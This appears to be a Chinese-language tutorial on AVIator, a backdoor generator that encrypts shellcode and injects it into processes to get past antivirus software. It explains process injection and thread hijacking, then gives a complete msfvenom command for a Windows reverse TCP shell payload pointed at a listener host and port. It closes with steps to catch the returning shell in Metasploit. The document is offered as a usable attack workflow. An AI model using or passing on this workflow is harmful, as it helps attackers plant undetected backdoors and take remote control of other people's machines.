AVIator -- Bypass AV tool

前提概要

项目地址：https://github.com/Ch0pin/AVIator

AV：全名为AntiVirus，意指为防病毒软件

AVIator是一个后门生成器实用程序，它使用加密和注入技术来绕过AV检测。进一步来说：

• 它使用AES加密来加密给定的shellcode
• 生成包含加密有效负载的可执行文件
• 使用各种注入技术将shellcode解密并注入目标系统

1. 便携式可执行注入，包括将恶意代码直接写入进程（没有磁盘上的文件），然后使用其他代码或通过创建远程线程调用执行。注入代码的位移引入了重新映射内存引用的功能的附加要求。这种方法的变化，例如反射DLL注入（将自映射DLL写入进程）和内存模块（写入进程时映射DLL）克服了地址重定位问题。

2. 线程执行劫持涉及将恶意代码或DLL的路径注入进程的线程。与Process Hollowing类似，必须首先暂停该线程。

 工具界面：

注入功能：

 

利用过程

工具编译是由三部分组成

1. 包含用于加密shellcode的加密密钥的文本
2. 包含用于AES加密的IV的文本
3. 包含shellcode的文本

其中shellcode部分是利用csharp组成的字节码

利用msf生成payload：

msfvenom -p windows/x64/shell/reverse_tcp_rc4 LHOST=10.0.2.15 LPORT=4444 EXITFUNC=thread RC4PASSWORD=S3cr3TP4ssw0rd -f csharp

将生成的字节码copy放到工具当中

然后按照如下步骤生成

随后在MSF中监听

其中RC4PASSWORD的值是之前msfvenom中设置的密码

直接运行，并在msf接受反弹回来的shell

当explorer下的cmd.exe进程结束的时候，explorer父进程也将终结